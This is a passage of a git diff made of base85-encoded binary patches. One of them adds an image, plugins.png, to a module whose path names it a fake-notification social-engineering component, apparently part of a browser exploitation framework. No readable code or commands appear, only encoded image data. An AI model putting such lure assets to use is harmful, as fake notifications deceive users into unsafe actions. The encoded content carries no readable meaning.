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

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_notification_c/img/plugins.png b/modules/social_engineering/fake_notification_c/img/plugins.png
new file mode 100644
index 0000000000000000000000000000000000000000..1f3be3711291a6b6e336ba4e93108d9ec6dbaf2a
GIT binary patch
literal 35015
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
